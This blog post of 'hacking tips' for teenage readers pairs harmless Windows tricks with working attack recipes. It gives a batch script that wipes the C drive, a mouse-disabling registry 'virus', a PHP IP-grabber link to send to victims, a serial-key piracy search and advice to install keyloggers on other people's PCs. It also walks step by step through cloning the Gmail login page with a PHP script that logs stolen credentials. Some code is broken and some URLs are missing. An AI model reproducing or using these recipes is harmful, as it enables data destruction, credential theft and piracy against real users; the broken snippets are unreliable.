Some cool Hacking Tips N Tricks

<Hello World>, Hacking is always fun. As a harvested hacker, let me tell you the cool side of Ethical Hacking.

*It is mandatory to understand that this article content is our education purposes only, please DO NOT act any cybercrime.

Disclaimer: (Above age 15 Only)

1. Introduction.

2. Making Nameless Folder in Windows.

3. Finding Serial Key of Any Software Using Simple Google Trick.

4. Learn To Hide Files behind the Images.

5. Active and genuine any windows anytime.

6. Learn To Make Dangerous Virus In a Minute.7. Make a virus that disable mouse.

8. change your IP less then a minute and Grab someone IP address.

9. Access Save passwords in your/other PC’s.

10. Phishing Attack to access any passwords.(Gmail,FB,Yahoo,Rediff  etc.)

11. Prevent from hackers.

12. Contact us.

Different hackers/programmer/developers/authors have different views on hacking, but basically I think that Hacking is like a sudden gift that  surprise you ;) sometimes it hurt and sometimes happier.   Hackers are human like the rest of us and are, therefore, unique individuals, so an exact profile is hard to outline. The best broad description of Hackers is that all Hackers aren’t equal. Each
Hacker has Motives, Methods and Skills. But some general characteristics can help you understand them. Not all Hackers are Antisocial, Pimple-faced Teenagers Regardless, Hackers are curious about Knowing new things, Brave to take steps and
they are often very Sharp Minded.
Computer Hackers have been around for so many years. Since the Internet became widely used in the World, We have started to hear more and more about hacking.
Only a few Hackers, such as Kevin Mitnick, are well known.In a world of Black and White,
it’s easy to describe the typical Hacker. A general outline of a typical Hacker is an Antisocial, Pimple-faced Teenage boy. But the
Digital world has many types of Hackers.
Now Here I am providing you list of Top 10 hackers of world till 2012:

10. Kevin Mitnick
9. Kevin Poulsen
8. Adrian Lamo
7. Gary McKinnon
6. Robert Tappan Morris
5. John Draper
4. The Masters of Deception       (A Group of Hackers*) 
3. Matthew Bevan and Richard Pryce
2. Jonathan James
1. Albert "segvec" Gonzalez

Hacker is a word that has two meanings:
• Traditionally, a Hacker is someone who likes to play with Software or Electronic Systems.
Hackers enjoy Exploring and Learning how Computer systems operate. They love discovering new ways to work electronically.
• Recently, Hacker has taken on a new meaning — someone who maliciously breaks into systems for personal gain. Technically, these criminals are Crackers as Criminal
Hackers. Crackers break into systems with malicious intentions.



Types of Hacker
Let’s see the categories of Hackers on the basis on their knowledge

The Real Hackers are the Coders, the ones who revise the methods and
create tools that are available in the market. Coders can find security holes
and weaknesses in software to create their own exploits. These Hackers can use those exploits to develop fully patched and secure systems.
Coders are the programmers who have the ability to find the unique vulnerability in existing software and to create working exploit codes.
These are the individuals with a deep understanding of the OSI Layer Model and TCP/IP stack.

Admins are the computer guys who use the tools and exploits prepared by the coders. They do not develop their own techniques,however they uses the tricks which are
already prepared by the coders. They are generally System Administration, or Computer Network Controller. Most of the Hackers and security person in this digital
world come under this category.
Admins have experience with several
operating systems, and know how to exploit
several existing vulnerabilities. A majority
of Security Consultants fall in this group and work as a part of Security team.

>Script Kiddies
Next and the most dangerous class of Hackers is Script kiddies, They are the
new generation of users of computer who take advantage of the Hacker tools
and documentation available for free on the Internet but don’t have any
knowledge of what’s going on behind the scenes. They know just enough to
cause you headaches but typically are very sloppy in their actions, leaving all
sorts of digital fingerprints behind. Even though these guys are the teenage
Hackers that you hear about in the news media, they need minimum skills to carry out there attacks.

Now let’s start the fun because I think that introduction is enough to gain your interest about hacking.

Making Nameless Folder in Windows :
· Make a Newfolder on desktop or where ever you want.
· Right click on this newly created folder and select Rename.
· Erase the text showing "New Folder".
· Now keep Pressing Alt (i.e. alter key) and type 255. If you are on laptop then you need to enable your Num Lock and type from the highlighted number keys not from those below function keys.
· After that leave alt key and Press enter.
· Done you just created nameless folder. J

3. Finding Serial Key of Any Software Using Simple Google Trick:
   · Go to Google
· Then type  Software Name 94FBR
   · Replace Software Name with the name of software whose serial key     
     you want to find
· Eg: To find serial key of Nero i will type Nero 94fbr
       Now press Enter and you will find serial key of software J

4. Learn To Hide Files behind the Images:
    · Select an image to be used for hiding file behind the image.
     ·Now select a file to hide behind the image and make it in .RAR format. With the help of the WinRAR.
    ·And most important is that paste both the files on desktop. You may do this anywhere instead of desktop if you have some basic understanding of command line.
    ·  Now open cmd by going to Start > Accessories > Command Prompt and type following commands in it.


     ·CD stands for change directory by typing above command you change your directory to desktop. After that type command given below.
 Copy /b imagename.jpg + filename.rar finalimage.jpg .
     ·Replace imagename.jpg with the name of image you want your file to be hidden behind. Don't forget to add image format (Eg: .jpg,.png,.gif)
     ·Replace filename with name of your file you want to hide. It must be in .rar format.
    ·Finally Replace finalimage.jpg with whatever name you want your final image with hidden files should be. This is the image where your file will be hidden.
    · Now when you will try to open this newly created image it will open as normal image, but to open you hidden file you need follow steps given below.

How To Access Hidden File ?

To access your hidden file you need to open the newly created image in winrar. Just follow simple steps given below to do that.

 · Open winrar
 · Now locate your image and open it or simply drag your image in winrar.
 · Extract the file and done J

5. Active and genuine any windows anytime:
Here I am giving you a web address, just go through the instruction and download it.

6. Learn To Make Dangerous Virus In a Minute:
 · Open Notepad and copy below code into it.
   @Echo off
   Del C:\ *.* |y
 · Save this file as virus.bat (Name can be anything but .bat is must)
 ·  Now, running this file will delete all the content of C Drive.

Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

7. Make a virus that disable mouse:

 · Open Notepad and copy below codes
   rem ---------------------------------
  rem Disable Mouse
  reg delete %key%
  reg add %key% /v Start /t REG_DWORD /d 4

  rem --------------------------------
·  Save this file as  virus.bat
·  Done you just created your virus.

 8. Change your Ip in less then 1 minute and How to grab someone IP address:

· Click on "Start" in the bottom left corner of the screen.
· Click on "RUN" .
· Type in "cmd" and click OK.
·  Type "ipconfig /release" just like that, and press "enter"
 ·  Type "exit" and leave the prompt
  ·Right-click on "Network Places" or "My Network Places" on your desktop.
  ·Click on "properties.
·Now you should  be on a screen with something titled "Local Area Connection", or something  similar to that, and, if you have a network hooked up, all of your other networks.
  · Right click on "Local Area Connection" and click "properties"
  ·Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
  ·Click on "Use the following IP address" under the "General" tab
  ·Create an IP address (It doesn't matter what it is)
  ·Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
  ·Press the "Ok" button here
  ·Hit the "Ok" button again

     Now you should be back to the "Local Area Connection" screen.
  ·Right-click back on "Local Area Connection" and go to properties again.
  ·Go back to the "TCP/IP" settings
  ·This time, select "Obtain an IP address automatically"
  ·Click on "Ok"
  ·Hit "Ok" again.
  ·Now you have a New IP address.
Now I think you learn to change IP,I think let start to Grab someone IP address J
      ·Copy the below codes into Notepad and save it as Grab.php (.php  
        is must).
   $hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
   $img_number = imagecreate(400,95);
   $backcolor = imagecolorallocate($img_number,10,102,153);
   $textcolor = imagecolorallocate($img_number,255,255,255);
  $number0 = " This is Your IP/Proxy";
  $number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]";
  $number2 = " Host/Proxy: $hostname";
  $number4 = " _________________________________";
  header("Content-type: image/png");
  $file2 = "- IP joined - IP/Proxy:   $_SERVER[HTTP_X_FORWARDED_FOR] - Host: $hostname - '\n' ";
  fwrite($file, $file2);
·Now make Free account on any of  the free web hosting sites Ripway or on  My3gb .
· Now Upload Grab.php to your web hosting site.
· Copy the link of your  uploaded file and send it to victim.
· As soon as victim will click on your link his ip will be saved in your free web hosting site.
· Enjoy now  you are Done !!

9. Access Save passwords in your/other PC’s:

     In this section i will talk about how keylogger can harm you in   different ways for example It can be used by your enemy or friend to get sensitive information such as your username and password, Bank credit card details, or any other activities you do on your computer.
· Example: You login in to your Facebook account from a computer in which keylogger is install then your username and password will be captured.
 There are two types of keylogger hardware keylogger and software  keylogger. Software keylogger is install in your computer where as a Hardware keylogger is attached to your keyboard. Looking at below images will clear your mind. Now I hope you all might understand what I want to say so, Just Install any keylogger and enjy  but through my option Award Keylogger is d best J 

10. Phishing Attack to access any passwords.(Gmail,FB,Yahoo,Rediff/Hotmail/orkut etc):

  Phishing is one of the type of hacking . It is a method of acquiring sensitive information such as username, password, bank information etc. Phishing page could be safe as an duplicate page of real one. Its look exactly similar as the real page.But when user enter sensitive information on such phishing page his information is send to the E-mail address provided in the phishing page or you can say the one who created that phishing page. Phishing page is mostly send via mail. Target of phishing are mostly social networking sites like facebook, orkut etc. Also Banks website to acquire credit card details,website like yahoo, gmail are also target of phishing.

Example of Phishing scams:
· Email asking you to login to your locked account to unlock it.
· Email carrying a Link to sites like Facebook,yahoo etc and asking   
   you to Login.
·  Emails containing some Information of your Interest and asking
    you to Login to Your Account.
So here we go:
A small example of phishing:
If you want to access any one password from any social site  and if it is found in login page at password box like this:
Then just right click on that dot format and find the inspect element of that area.
(Inspect Element provides the page source codes in HTML format)
There u find
    <input id="Passwd" type="password" name="Passwd"></input> 
    Now click on " type="password" and write  the "text" in place of   "password".
    Then you see on the login page that password will appear in Text  
    Enjy J  

Example 2:

This time website fun :

In this operation,You can easily edit any website in your own way,but it’s temporary just for fun any website of your choice

2.Now remove the address and copy paste this JavaScript over address bar

javascript:document.body.contentEditable='true';document.designMode='on';void 0

3. Now do whatever you want to do with that website.

Example 3:

So for before going to mail phishing, let me suggest you one thing that it works for a limited time because the mail sites enhances their security level from time to time .so,here we go:

I think everyone wants to hack gmail,yahoo mail,facebook,orkut n other social sites.Let me explain you one thing before I am going to start this trick that try at your own risk .

1. Create an account in any free web hosting site.I recommend

2. I use Mozilla Firefox ,(highly recommend using this browser for its security and customization.) So I would go to and click File -> Save page as… , or simply hit <CTR> + S which does this automatically. Choose where you would like to save the web page and hit Save.u can use it for any social sites but I am just taking a popular example (gmail)
3. Once you have it saved, rename ServiceLogin.htm to index.htm. The reason you want to name it “index” is so when you upload it to a web host and someone goes to your link, the index page is the first page that shows up.
4. Next the hacker would create a PHP script to do his dirty deed of steeling your information. Below is a simple PHP script that logs and stores your login details when you click “Sign in”. To see how it works, copy and paste the following code into notepad. Next save it into the same directory as you saved the Gmail page, and name it phish.php. In addition to the phish.php page, create a new empty text file and name it list.txt.
5. <?php // This marks the beginning of the PHP script.
Header(“Location: “); // once you click “Sign in” in the fake website, this redirects you to the real Gmail website, making the whole process look more legit.
$handle = fopen(“list.txt”, “a”); // this tells the server to open the file “list.txt” and get it ready for appending data. Which in this case is your username and password.
Foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
} // This section simply assigns all the information going through this form to a variable. This includes your username and password.
Fwrite($handle, “\r\n”); // This writes your details to the file “list.txt”
fclose($handle); // This simply closes the connection to the file “list.txt”
?> // Marks the end of the PHP program.

So far you should see the following in your folder:
 Now the hacker would have to edit the main Gmail page to include his PHP script. To see what the hacker would do, open up the main Gmail page named index.htm with notepad.
6. Hit <CTR> + F , or go to Edit -> Find , type in action and hit “Find Next”.

7. This will highlight the first occurrence of the word “action” in the script and you should see the following:
There are two “action” occurrences in the script so make sure you have the right one by looking at the “form id” name above. Change the link between action = “ “ to phish.php . This will make the form submit to your PHP phish script instead of to Google. After the link you will see the code:

Change the word “POST” to “GET” so that it looks like method=”GET”. What the GET method does is submit the information you type in through the URL so that the PHP script can log it.

8.Save and close the file.
 Next the hacker would upload the files up to a free webhost that supports PHP. With a simple Google search you can come up with a bunch that fall under this category. Once all the files are uploaded, you must give writing permissions to the “list.txt” file. Every hosting company should have a CHMOD option next to each file. Select this option and change the file permission for “list.txt” to 777. If you can’t figure out how to do this, ask people that use the same host or simply Google something similar to: “”.

9.Once everything is up and ready to go, go to the link your host provided you for your website and you should see the Gmail page replica. Type in a username/password and click Sign in. This should have redirected you to the real Gmail page.

10. Now go take a look at your list.txt file by going through your hosting file manager or going to Although this is the most common, the web host you use may provide a different looking URL. Now if I put a username of “myusername” and a password of “mypassword” then “list.txt” would now look like the following:

Don’t forget to say thank after you hack it .

. Prevent from hackers:

·Don’t  share your passwords from any one either  your boyfriend or girlfriend.

·Always sign out from your account when you used it,because sometime spam attack in your account and it easily hack your password.

·Turn off your home sharing option when you are not using it.

·Clear your track files using  cleaner,I suggest CCleaner is the best.

·Install a firewall on your computer.

·Change your passwords every month.

·Purchase or download anti-virus software.

·Delete emails from unknown sources. Never click on an emailed link that looks questionable.

Sources for writing this Blog :
1.Internet Sources:

· How to unblock everything on Net
·Network Phishing
·Hacking: The Art of Exploitation
And Self sources ,friends and a lot from News and Magazines…


or mail me at


Post a Comment

Popular posts from this blog

Problems @Microsoft Outlook

Microsoft Outlook